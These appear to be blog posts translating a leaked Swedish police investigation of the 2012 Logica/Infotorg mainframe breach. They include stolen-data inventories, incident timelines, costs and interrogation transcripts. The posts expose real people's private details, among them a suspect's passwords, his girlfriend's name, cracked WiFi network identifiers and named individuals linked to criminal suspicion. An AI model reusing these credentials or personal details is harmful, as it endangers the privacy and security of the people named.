The attack surface has narrowed through various technical limitations.

Intrusion attempts to SYS19 is handled by whitelisting FTP traffic from approved IP addresses and protocol filtering previously used in the attacks (telnet traffic and traffic on port 443). Misc traffic that hasn’t been proven legitimate has been filtered.

Intrusion attempts to SYS3 is handled by whitelisting traffic to FTP and filtering illegitimate traffic.

All system administrator accounts have changed passwords, compromised administrator accounts are replaced.

Last found intrusion in SYS3 occurred on 23rd March through FTP and telnet. Last found intrusion on SYS19 occured on 16th March through telnet.

Continous intrusion attempts happen targeting web services based on the list of usernames stolen from SYS19.

Detailed information regarding known leaked information

Description of contents in the files copied from respective system.

SYS19
– SPAR (Statens Person och Adressregister) information, list of social security numbers for citizens born 1964 and later.
– Infotorg invoice information – Invoices, amounts of transactions per customer.
– PI (logins on Infotorg) – Files sent to LIME (CRM). All information regarding customers in Infotorg and their permissions.
– Infodata (Postal service) – Adress matching
– Infotorg (PWC) – Specification of project marking for invoices
– The police – 2 million social security numbers, only.
– Applicate (Radiotjänst) – Invoice information
– Infotorg/Infodata/Police – Invoice information, transaction type and amounts.
– Police – Transaction statistics from 2006
– Infodata – Three datasets where the file name contains the text “protected”. The datasets are from year 2007. 10 793 social security numbers in total, a copy and two originals have been stolen.
– Applicate (mixed customers) – Invoice statistics
– Infodata – datasets containing social security numbers in relation to eachother
Infotorg – BASUN (company information from SCB). Base information, names, legal form, company size etc.

SYS3
– FLISTEST – Handelsbanken’s invoices to their customers 2006 and 2007

– According to the bailiff agency circa 40 cleartext files containing customers and debtors that are normally sent to the UNIX systems have been copied from SYS3. The files contain social security numbers, debts, who the person owes money. The files also contain information about debts for people with protected identities.
– Payment files for Swedbank and signet for signing payment files have been copied from SYS3, the signet has been replaced.
– The Cobol source code for the program Navet has been copied together with KFM’s Navet certificate. The code was used by the intruder to find vulnerabilities in the Navet application. The application is however only available from the tax agency’s network and not publicly available.

Information about how the escalation was made during the intrusion

Applicate and Logica found on the 7th March that SEMCICA3 in SYS19 had an unusually high CPU usage, many transactions were running by a questioned user. The activity was considered unauthorized and a security incident was stated on the 8th March wherein an investigation began. (IM3107818).

16th March
Applicate found that the attacker established more access to the system and calls for a crisis meeting. Logica establishes Major Incident Manager and calls in specialist competence from IBM.

Applicate files a report at the Security Service on 19th March.

Intrusion is found in SYS3 whereas Logica contacts the Security Service with a report 21st March.

Information about accounts used at information retrieval

25th February
The first known account used was an account from the Swedish Parliament (AVIY356). This user has through zOS and USS began downloading approximately 400 datasets and files from Logica. It has been found that an amount of accounts have been used throughout time and that many of them have been manipulated to receive special and superuser permissions in the systems.

Which sort of traffic was queried from Dalarna

An investigation has been made on a selection of search queries done on Infotorg. As previously mentioned there have been searches done on Jim Keyzer, Gottfrid, PRQ, Police registered cars in the car registry etc.

Below follows a short selection with explanations:

LN: Swedish representative for space project Cospar

JE: Could be one of the attackers searching for himself (?)

MB: Police who took action against filmmaker and forced deletion

Håkan Marklund: Robinson participant (Swedish TV show)

Mikael Persbrandt: Actor

RÅ: Appears to be a technician certifying himself

LB: Cat owner and kindergarten teacher, possibly in Norrtälje

ET: Charged for knife stabbing in Ludvika

AB: 17 year old blogger

Reflection:
Young people have probably received login details for Infotorg by the more competent main actors. These younggsters have searched for famous people, a blogger and people in Ludvika/Smedjebacken and have most likely not had a slightest idea about the eventual risks of the searching. Probably anchoring in Ludvika/Smedjebacken.

Other affected organisations

After going through retrieved datasets it has been found that affected organisations can be limited to:

– Logica
– Applicate
– Tax agency
– Bailiff agency

Logica, National Special Event: Morgan (part 2)

May 3rd, 2013 by qnrq

Applicate incident description

bisnode_overview

7th March 2012

An Applicate employee receives a warning message at 7 AMsaying that there is unusual activity in the mainframe environment; one of the InfoTorg users is trying to access a large amount of files that the employee administrates and the user account isn’t authorized to view.

The employee contacts Applicates security manager around 7:30 AM explaining that the user account is trying to access the circa 10 000 files which the employee administrates.

The security manager contacts Applicates operations manager informing him what has happended. The operations manager in turn contacts Applicates CEO to report the findings. Applicate forms a team to handle the incident. The team consists of Applicate’s CEO, the security manager and operations manager.

The Infotorg account which is being used turns out to be owned by one of the Infotorg sales people and the account is locked. The sales person is contacted to ensure that the login details are used properly and hasn’t been handed over to third party.

The operations manager contacts Logica to book a meeting for the following day.

8th March 2012

The Applicate incident team has the booked meeting with Logica around 9:30 AM, Logica’s customer manager and Logica’s security manager is present. Details are given to Logica during the meeting.

9th March 2012

It is discovered that multiple user accounts have been used in a strange and improper way. IP addresses are traced to various countries, including Cambodia, from where Infotorg’s customers usually don’t connect.

Applicate’s CEO contacts Logica’s CEO with information that Applicate suspects that there is an occurring security incident affecting Logica. Logica assigns Applicate a person who helps Applicate block suspicious IP addresses that are used to access breached accounts.

10th and 11th March 2012

Applicates incident team analyzes logfiles and suspected IP addresses and block IP addresses and user accounts that are believed to be used in improper ways.

12th March until 20th March 2012

Daily meetings are held between Applicate and Logica. Applicates incident team continues analyzing logs and blocking suspicious IP addresses and user accounts. It is noticed that the amount of user accounts being used improperly keeps escalating. On the 19th March Applicates incident team contacts the police.

21th March 2012

8:20 AM Logica informs Applicate that unaothorized logins have been made not only in SYS19, the machine dedicated to Applicate and Infotorg, but also in SYS3. It is also revealed that somebody has accessed system wide admin account, a NUS, that grants nearly full permissions to SYS3 and SYS19. Around 14:30 Applicate’s incident team finds that sensitive information owned by the tax agency has been downloaded by the attackers. The security managers from the tax agency and bailiff agency are contacted. 16:38 PM the unauthorized NUS user has a failed login attempt and around 20:00 PM intrusion attempts are detected from new IP addresses.

23rd March 2012

Starting this date the investigation proceeds with the Swedish National Police Agency and Activity Protection. Logica, IBM, Applicate/Infotorg and KPMG begin work with affected government agencies and provides them logfiles. Applicate/Infotorg begins modifying the infrastructure to prevent future attacks of this sort. Intrusions end in April 2012.

Cost

Applicate hired consultants for in total 2 000 000 SEK to work with the incident. Infotorg changed its routines for password management in its services, they changed the policy to require more complex passwords. To achieve this Infotorg hired consultants and existing staff had to work overtime. In total Infotorg has spent up to around 2 200 000 SEK to achieve this.

In addition to these costs management staff has spent time corresopnding circa 440 000 SEK. Key people in Bisnode have also had to spend time on controlling logging, following up credit investigations and troubleshooting etc. The costs for this is estimated to circa 275 000 SEK.

In total the claimed damage caused to the Bisnode group is estimated to be circa 4 915 000 SEK.

The intrusion in Applicate was reported by Axex AB, a security and risk management company. They are most likely the consultants that were hired for 2 000 000 SEK to gather evidence. There is therefor reason to believe that Axex has conducted surveillance on people living in Cambodia as part of the investigation.

Logica, National Special Event: Morgan (part 1)

May 1st, 2013 by qnrq

Logica discovered that their systems had been breached 6th March 2012. 16 days later they filed a report to the Swedish police. The extent of the breach was unknown and it was assumed at the beginning that all information handled by the company had leaked. It was confirmed pretty soon that the social security numbers of over 10 000 individuals with protected identities had been stolen from the mainframes.

This writing is split into multiple parts, links to following parts will be added when published in the future.

The investigation work was found to be outside the Security Police’s scope and RPS (national police) initiated the work. All affected staff in national police forces, the tax agency and bailiff agency received information about the incident. A big meeting was held 23rd March to organize the investigation, approximately 40 people were in the meeting. The work was divided into smaller groups where each company and governmental agency had at least one representative in each group.

The coming weeks a large portion of the involved staff had their hands full. The security service assisted the national police agencies. The incident was considered so serious that on 28th March the head police chief issued a national special event in accordance with Ordinance (1989:773) with instruction to the national police to coordinate the police tasks and cooperate with external governmental agencies.

The Swedish police did it’s investigation at a flat rate price of 920 kr/hour, same price as the police charges for covering sports events. The calculation below is only based on the work that RPS spent on “handling the incident and securing that the information used in the investigation is trustworthy” (sic).

RPS Activity protection: 1 273 599,00 kr
RPS Communications department: No data
RPS/RKP: 63 480,00 kr
RPS/PVS: 713 000,00 kr
RPS System owners: No data
SÄPO (Security Service): 2 300 000,00 kr
HK Management: 36 800,00 kr
PVS Management staff: No data
Remaining work (estimated): 326 792,00 kr
Total: 4 533 823,00 kr

“Virtually all communication between suspects has occurred or is occurring through the IRC channel #hack.se. In there people are relatively openly discussing hacking and “everybody” knows what is happening, is involved to some extent or have an overview of what is going on. (sic)”

Fishing in Ludvika

dirox_map

By analyzing logfiles from Logica and subsequent IP tracing it was found that multiple IP-addresses pointed to a relatively small geographical area in Ludvika, Sweden. There was therefor reason to suspect that one and the same person had used multiple wireless networks. Multiple queries done on Infotorg’s web interface could be connected to diROX, suspect “MG”, through internal reconnaissance.

On suspect MG’s cellphone forensics personnel found the Infotorg app installed, which should only be available for companies, organizations and governmental agencies that are Infotorg customers. When forensics personnel started the app the username “KURS104” was saved. MG’s cellphone also contained an installed portscanner app, which when started container “ftp.infotorg.se” prefilled in the host field.

dirox_phone

On an SD-card found in MG’s cellphone the forensics personnel found, in the path /u1/Ubuntu One/Linux/Hacking/, the programs reaver_v1.4 and wpstools, which can be used to break into WiFi networks. In the Keys folder they discovered folders named wep, wpa-captures, wpa-knackt and wpa-oknackt. In wpa-knackt they found text documents 54-E6-FC-BE-80-9A_Backe.txt and A0-21-B7-7A-3E-7E_LINNEA_Network.txt containing identification details and login credentials to WiFi networks that had been used to access Infotorg/Logica servers.

ubuntu_one_map_dirox

Much of the contents of the SD-card was also retrieved from an FTP account on Passagen.se and Ubuntu One, with nicknames being dirox and e-mail address [email protected] In a computer seized by the police from diROX they found browsing history for his ftp.passagen.se account, using password qw97p48z

Screenshots seized from diROX’s Ubuntu One cloud storage show somebody was signed into hacked Infotorg accounts at the same time as browsing social media sites like Facebook and Helgon while chatting on MSN and reading Gmail account luciddream:

infotorg_screen

Large amounts of files with usernames and passwords for Infotorg accounts were discovered in MG’s possession along with multiple files containing passwords to hacked WiFi accesspoints located around his address. On his passagen.se FTP account the investigators found large amounts of logfiles containing communication with tLt. On MG’s Ubuntu One account they found a large amount of datasets matching the data that had been downloaded from Logica mainframes. There were also traces of intrusion targeting Logica and Infotorg dated 2010, 2011 and 2012. Both connections to Logica mainframes and queries in Infotorg.

Hearings

15th April 2012
MG was heard in regards to being suspected of hacking alternatively assisting hacking between 25th February and 15th April 2012. MG is suspected of illegally accessing and searching in Logica hosted Infotorg registries.

MG is informed about his right to have a lawyer present but chooses to be heard alone. MG denies crime. He states that he has signed into Infotorg from his own or his girlfriends computer at a few times. At these times he has found some passwords on the Internet that other people have posted. MG states that he has used his own security number to login using these passwords. MG considers himself to be pretty good at handling computers. His girlfriends name is LB and owns an IBM laptop protected by the password phrase FITTJUV.

MG is asked if he really doesn’t want a lawyer present and after thinking for a while says that perhaps that would be a good idea. MG requests Björn H. The hearing is cancelled.

15th April 2012, 14:00 PM
Two police officers transported diROX from Borlänge to Stockholm. The trip took 2.5 hours and the three of them had a social conversation during the whole time. diROX was disappointed over his life and thought that he had let his parents and his girlfriend down. diROX asked what kind of punishment he would be facing for hacking and stated that his girlfriend’s innocense. He also said that he had found passwords on the Internet and tried if they worked. According to himself he had only queried information about himself. He added that “there are more people involved, not only him.”

17th April 2012, 14:10 PM

MG admits crime as soon as they are presented. He says that he has only been logged into Infotorg’s website. He states that he has Linux experience, not very good at networking and has no programming knowledge. Interrogators ask why he has been googling about Infotorg, MG replies that he hasn’t been looking for anything specific. MG says that he found login credentials on a Swedish forum that he forgot the name of. He claims to have tried around 5 accounts and that he doesn’t have anything on his computer after it’s been lost at reinstall done “the other day”.

MG says that he has been logged into Infotorg “maybe a week ago” and has only been looking up himself and his friends in the registry. MG says that he has been acting alone and doesn’t know if he has shared the information with anybody else.

Interrogators bring up his .bash_history file where he is greping a file named log.txt for the string Ludvika. Interrogators bring up that his girlfriend has stated in hearings that he can hack into wireless networks, that MG accesses access points in the area. He names his passwords being fittjuv and apa123 on his computers, apa123 being his most commonly used password.

16th May 2012, 09:00

MG is informed that the suspicions have been extended from 25th February 2012 – 15th April 2012 to January 2010 – 15th April 2012. MG says that he doesn’t think so and denies. When asked if he’s denying both Logica and Infotorg he responds that he possibly may have been illegally accessing Infotorg since 2010. Interrogators continue asking about the .bash_history file found on MG’s girlfriend’s computer which contains data about Infotorg. MG doesn’t know anything about it, except the name Infotorg. MG denies knowledge about a memory card containing a folder called Infotorg, which his girlfriend has said in a hearing belongs to him. He also denies using cloud services and the hearing is ended shortly after.

14th June 2012

Interrogator asks if MG has gotten the Infotorg accounts from somebody, MG responds “unfortunately no” and continues stating that he just finds them, but doesn’t want to say where. Interrogator asks if MG knows the IRC channel #hack.se, which he does and he has been there before but doesn’t know how long ago or what nickname he used. The nickname diROX sounds familiar to MG, but he says it is not his and he doesn’t know him. MG is asked about KS (suspect #2) and his IRC nickname used in #hack.se. The interrogator tells MG that KS is also detained as part of the investigation of the case.

The interrogators explain that they have found material from Infotorg and Logica on computers seized from KS. MG denies that KS has received such data from him. The interrogator says that KS has said that MG is diROX, MG denies and says that he doesn’t think that he has used that nickname but he has seen it. MG doesn’t know if it is his nickname or somebody else’s. The interrogator tells him that they have seen in his computers that MG is in fact diROX.

The interrogator continues listing nicknames from #hack.se which MG confirms he has seen and spoken to. The interrogator asks if MG recognizes the nickname Anakata. MG says that Anakata is Gottfrid from The Pirate Bay. Interrogator asks if he knows TiAMO, which he does from The Pirate Bay and #hack.se but they haven’t spoken.

The interrogator asks about what they talk about in #hack.se, and says that KS has said in a hearing that the latest topics have been the hacking of Logica and Infotorg. The interrogator explains that KS has named MG as connected to the attacks on the two named targets. MG denies that he is involved or that he knows anybody that is.

18th June 2012

Interrogators clafiry that MG is suspected of retrieving data from Logica mainframes and manipulating RACF. MG doesn’t understand. Interrogators ask about RACF and talk about traces they have found in MG’s possession. MG doesn’t know anything about RACF and denies retrieving info from the mainframes. MG doesn’t understand anything except that Logica has been breached.

Interrogators continue by asking if MG knows about Infotorg, which he does but he doesn’t have any ideas who’s running it. Interrogators ask if he knows what a mainframe is, MG explains that they are computers that can handle pretty much.

Interrogators clarify that MG is suspected of visiting Logica mainframes, manipulating RACF and done unauthorized queries in Infotorg. MG admits the Infotorg parts and knows that he isn’t allowed to do what he’s done using other peoples’ accounts.

Interrogators name the third suspicion, that MG has illegally broken into and used WiFi networks of his neighbors, which MG admits he has. Interrogators explain that MG’s IP address has been found in Logica mainframe logs along with his neighbors’ IP addresses.

After the interrogators continously state that suspect KS has named MG as diROX, that the nickname is found on MG’s computers and on his neighbors’ network activity he says that maybe he has used that nickname sometimes. MG admits that he has received several hundred Infotorg accounts from somebody on IRC but doesn’t want to say who gave them to him, although he knows who gave it to him.

MG denies that he has downloaded any data from any intrusion except saved queries he’s done on his friends in Infotorg. The interrogator asks if those friends of his can have been Hells Angels members, whereas MG responds “maybe”.

The interrogator says that he finds it strange that MG is admitting some things but not others and asks why that is. MG replies that he hasn’t done some of the things. The interrogator continues stating that they have data proving otherwise, which MG finds strange and doesn’t believe. When asked if MG thinks they are bluffing, he responds yes. The interrogators explain that there is more than they have told them, such as logs from CSN and IRC logs from #hack.se.

“We suspect or we strongly believe that you are not alone in this, we think that there are many more involved. The problem is that we can’t prove it. We only have what we have from you, so to speak.”

After chatting about his WiFi hacking activities the interrogators start pressuring him to reveal the identity of the person that supposedly gave the Infotorg access to MG, stating that KS has said that MG is diROX and that diROX is somebody involved in these matters. MG doesn’t know and the interrogators continue by verifying that MG admits two out of three charges. MG states that he knows somebody who has hacked the Logica mainframe on which Infotorg is run but doesn’t know if they are alone of how it happened.

“You don’t know. Have you been like a little hangaround, maybe you haven’t been allowed to be in the gang and haven’t really…?”

MG says that he thinks so. When asked he replies that he didn’t give anything in return for the data that he has received from an unnamed somebody or somebodies. He doesn’t know if it’s a criminal gang that has breached the mainframes or a loner.

JP: No… But, as long as you don’t want to tell it’s a little… then there are problems. We can’t… Because we know a lot of things that we can’t or want to tell, and if you don’t want to tell then we don’t get anywhere with this. Is there anything you would like to tell us that you think is important for us, without revealing too much?
MG: I don’t know, I can’t think of anything.
JP: It’s very sad when you can’t… that you can’t or don’t want to tell. That’s how it is. It would be better for yourself to say and…
MG: That I… (inaudible)
JP: But why so to speak?
MG: No, but then I will have problems later.
JP: Oh. So you’re afraid that they will retaliate?
MG: Exactly.
JP: OK. But how do you think it’s going to look later when you… when you’re released and this goes to court and we put up all the evidence? Then you will start to think anyway about what you said or why you were so careless to leave chat…
MG: Because of this chat?
JP: No, but why… We have found your chatlogs.
MG: OK.
JP: You don’t think that these people that you are afraid of will start to consider anyhow?
Lawyer: That is not an appropriate question to ask!
JP: Do you want to ask a question or what are you saying?
Lawyer: No, but I think it’s inappropriate that you formulate your question that way and put him in a corner saying he’s risking retaliation anyway. The court says that you can’t force somebody to say something that they don’t want to say if they are afraid of retaliation. Your question formulated that way (inaudible) and I don’t think that is an appropriate question.
Fhl: Yes, it is noted. But, we can ask that question anyway, I think. Do you have any comments on it then?
MG: No…

6th November 2012

MG voluntarily chooses not to have any legal defense at this hearing.

MG is asked what nicknames he’s using on IRC, he responds that he has difficulties with his memory sometimes. MG remembers that he used many different nicknames, among others diROX and Matte76.

Interrogators ask about Gottfrid Svartholm Warg. MG replies that he knows GSW, that they have met personally but doesn’t remember how long time ago. MG says that GSW has said on IRC that he was in Cambodia, that he left after The Pirate Bay conviction. MG says that he doesn’t remember GSW’s nickname that he used when they spoke on IRC.

Interrogators ask what computer knowledge GSW has. MG replies that GSW is very smart and knowing. MG considers himself good at computers but states that GSW beats him in computer science.

MG is informed about IRC conversation logs. MG is shown chat traffic retrieved from diROX’s Passagen.se FTP account between the aliases diROX and tLt between 2012-03-10 16:54-16:56 and 2012-03-25 21:11-21:15 and is asked to comment this log. MG spontaneously replies that tLt is Gottfrid Svartholm Warg. He remembers it clearly. He also says that the 2nd conversation where tLt talks about Infotorg accounts that it proves that MG has always been right in what he has been trying to explain: that he himself doesn’t have anything to do with these accounts. MG states that he has only tested to login on a few of those accounts but that other people have breached the systems. MG doesn’t want to name those individuals.